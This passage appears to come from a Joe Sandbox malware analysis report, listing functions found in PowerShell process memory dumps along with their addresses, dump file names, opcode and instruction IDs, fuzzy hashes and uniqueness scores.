                                                                                                • Opcode Fuzzy Hash: 624bc9e270f40506920790f5c85ad9f5306e3646db700ee8cb7c4b13d1305f79
                                                                                                • Instruction Fuzzy Hash: 5A31E67191CB488FDB18DF5CA84A6A97BE0FB59720F04426FE449C3252DB74A856CBC2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AC6EB89 Relevance: .1, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65598197462.00007FF85AC6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AC6D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ac6d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e794f1530b323365a846da625e2a5b2539c211d2638a309fb59c3f6cab90668
                                                                                                • Instruction ID: d02c5ca174101fd4ab82bb2a1fd3ff7f766e13a8ea72c0d60fe73e7f92a5bd7d
                                                                                                • Opcode Fuzzy Hash: 6e794f1530b323365a846da625e2a5b2539c211d2638a309fb59c3f6cab90668
                                                                                                • Instruction Fuzzy Hash: E041227180EBC44FE356CB38A8819523FF4EF57260B1905EFD089CB1A7D629AC06C792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8AC8A Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: becb5e2311f8c1c0a30f5b49eadc14cb323bdf9c73e36942849d549888d3399b
                                                                                                • Instruction ID: 4d5923dbfb659cd3d0fc371a52034704624d99b3f2f298624fa1dc0f87c0f3b4
                                                                                                • Opcode Fuzzy Hash: becb5e2311f8c1c0a30f5b49eadc14cb323bdf9c73e36942849d549888d3399b
                                                                                                • Instruction Fuzzy Hash: E821D23190CA0C4FDB68DE5CA88A6FA7BE0EB96331F14822FD149C3162DA719457CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD847F5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 476dfae4e6dd18f482ab5d8ec3528b78f35b0d3b3e0b0f5d5a5c5b7f979820ec
                                                                                                • Instruction ID: 8f73f81d122fc6c87d7b1120b056049cdeb6ef2e037e91c67ed0c7f5d4dc01c6
                                                                                                • Opcode Fuzzy Hash: 476dfae4e6dd18f482ab5d8ec3528b78f35b0d3b3e0b0f5d5a5c5b7f979820ec
                                                                                                • Instruction Fuzzy Hash: 6501447111CB0C8FD748EF0CE451AA5B7E0FF95364F10056DE59AC3651D636E881CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD8AAA8 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 79df366e8f7799c5b9b681dea6f93c764c4c3bcef41ec4e497fd6324460cb32c
                                                                                                • Instruction ID: 239de27dbc4eae1b18511ee14b400bd47b37acb5039b76bfe8a07fe47fe89baa
                                                                                                • Opcode Fuzzy Hash: 79df366e8f7799c5b9b681dea6f93c764c4c3bcef41ec4e497fd6324460cb32c
                                                                                                • Instruction Fuzzy Hash: 9CF02B3180C68D8FDB06DF2898564E97FA0EF16261F0902D7E458C70B2DB649954CBC2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AE549CD Relevance: .0, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65601278415.00007FF85AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AE50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ae50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fcfdc824d83eca08f68398451099bbc05c3349b19d70ebe9214ac4635d49e835
                                                                                                • Instruction ID: 5d767e7ae5507eb964dd841e4fdf18d027e7435fa141d53b199d67890dd956df
                                                                                                • Opcode Fuzzy Hash: fcfdc824d83eca08f68398451099bbc05c3349b19d70ebe9214ac4635d49e835
                                                                                                • Instruction Fuzzy Hash: C0F03A32A0C9558FD6A9EB1CF4414A873E1EF4936171900FAE29DC71A3EA26EC458798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AC6EC99 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65598197462.00007FF85AC6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AC6D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ac6d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b6a0f24e9a12cee383ff22fe97555b014bb4915ef72accb2553311598ab8106
                                                                                                • Instruction ID: 393a8d537333032d655b4d04fb81fa8e5784ecbf2f2af8078c29b7c913a36ba5
                                                                                                • Opcode Fuzzy Hash: 0b6a0f24e9a12cee383ff22fe97555b014bb4915ef72accb2553311598ab8106
                                                                                                • Instruction Fuzzy Hash: A2F01570519908DFCB95EA6DC085D2537E1FF18350B5408A8E04ACB2A1D624FC86CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00007FF85AD87A00 Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 50884af5607fb2442398b782fc4e8d993978d7cbb3e6eceb77a7daa6aa35455b
                                                                                                • Instruction ID: 0e8d5891221c78296dd2611824e21e320c462ff3eb3588988f0f3656695019ac
                                                                                                • Opcode Fuzzy Hash: 50884af5607fb2442398b782fc4e8d993978d7cbb3e6eceb77a7daa6aa35455b
                                                                                                • Instruction Fuzzy Hash: 45E0B635814A4D8F8B44EF18D8499EA77A0FB68315B01429BA81ED7560DB35AA58CBC2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00007FF85AD8587F Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000011.00000002.65599845342.00007FF85AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_17_2_7ff85ad80000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: T_I$T_I$T_I$T_I
                                                                                                • API String ID: 0-3247691911
                                                                                                • Opcode ID: f563592d614439a95c202e00ab23a208421d295966cd803ea3eb993978f4cf4d
                                                                                                • Instruction ID: 9bcad2ce8c7528e78a413584b4fa2dee79a46148c994ddc468bfa1931832fe89
                                                                                                • Opcode Fuzzy Hash: f563592d614439a95c202e00ab23a208421d295966cd803ea3eb993978f4cf4d
                                                                                                • Instruction Fuzzy Hash: ACD1F557E0F5C35BE169526C38AA5BE2BA2FF52EF071C01FBD0884B0DFB9059D064299
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 00007FF85AD947F5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000016.00000002.65828059411.00007FF85AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_22_2_7ff85ad90000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e34f7dd0f0dee8aad8242c76286a2983b7369832a043f846bec9d0c424897f5
                                                                                                • Instruction ID: 86f5b31498b3e052ae866333ce4cf0ae480446170d2ba2580f629e53c494bc57
                                                                                                • Opcode Fuzzy Hash: 3e34f7dd0f0dee8aad8242c76286a2983b7369832a043f846bec9d0c424897f5
                                                                                                • Instruction Fuzzy Hash: 3701447111CB0C8FD748EF0CE451AA5B7E0FF95364F10056DE59AC3651D626E881CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 00007FF85AD947F5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.66089186078.00007FF85AD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85AD90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_7ff85ad90000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2f45f3e348bc13dfec08dd782e9e528a615ffac34ebf8af8089e04e20d2856eb
                                                                                                • Instruction ID: 86f5b31498b3e052ae866333ce4cf0ae480446170d2ba2580f629e53c494bc57
                                                                                                • Opcode Fuzzy Hash: 2f45f3e348bc13dfec08dd782e9e528a615ffac34ebf8af8089e04e20d2856eb
                                                                                                • Instruction Fuzzy Hash: 3701447111CB0C8FD748EF0CE451AA5B7E0FF95364F10056DE59AC3651D626E881CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 00007FF85ADA47F5 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000001A.00000002.66388894678.00007FF85ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF85ADA0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_26_2_7ff85ada0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 782642c263bb92d2de325f35ad48cb0ffb93484bda6217190d6667eb804d1728
                                                                                                • Instruction ID: 1b81d549517b9f2cb669a357a7e6bd562bcc474ecebead2dc6f8cce2efb5b677
                                                                                                • Opcode Fuzzy Hash: 782642c263bb92d2de325f35ad48cb0ffb93484bda6217190d6667eb804d1728
                                                                                                • Instruction Fuzzy Hash: 2901447111CB0C8FD748EF0CE451AA5B7E0FF95364F10056DE59AC3651D636E881CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%